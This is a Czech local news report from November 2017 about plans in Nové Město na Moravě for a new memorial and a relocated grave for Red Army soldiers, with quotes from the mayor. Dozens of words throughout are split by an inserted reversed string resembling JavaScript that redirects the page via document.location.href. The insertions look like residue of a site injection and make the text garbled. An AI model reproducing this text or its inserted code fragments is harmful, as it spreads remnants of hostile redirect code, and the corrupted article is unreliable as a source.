Rainbow page separator

V Novém Městě chtějí padlým vojákům postavit nový pomník

Sobota, 4. listopadu 2017

Náměstí v Novém Městě na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Novým pomníkem chtějí v Novém Městě připomenout rudoarmějce, kteří padli v posledních dnech druhé svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové války a jsou pochováni ve společném hrobě na ka[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolickém hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově. Ten má být přesunut blíže k hlavnímu vchodu a rovněž ho ozdobí nový pomník.
„V roce 2020 oslavíme 75. výročí konce druhé svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové války a myslím, že je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dobrá příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost, abychom si připomněli její oběti,“ přiblížil novoměstský starosta Michal Šmarda.
S exhumací a následným přestěhováním ostatků padlých musí souhlasit nejen české, ale i ruské úřady. „Ruská strana měla pouze jednu podmínku, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to že na pomníku musí být pěticípá hvězda mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to původně navrhovaného pravoslavného kříže. Vysvětlují [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to mnohonárodnostním složením Rudé armády,“ doplnil starosta. Náklady na nové pietní mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nepřesáhnou půl milionu korun, přičemž se na nich má podílet také ministerstvo obrany.
Novoměstská radnice již oslovila několik výtvarníků, kteří v průběhu lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu připraví své návrhy ohledně vzhledu nového pomníku. Výslednou podobu pak schválí zastupitelé.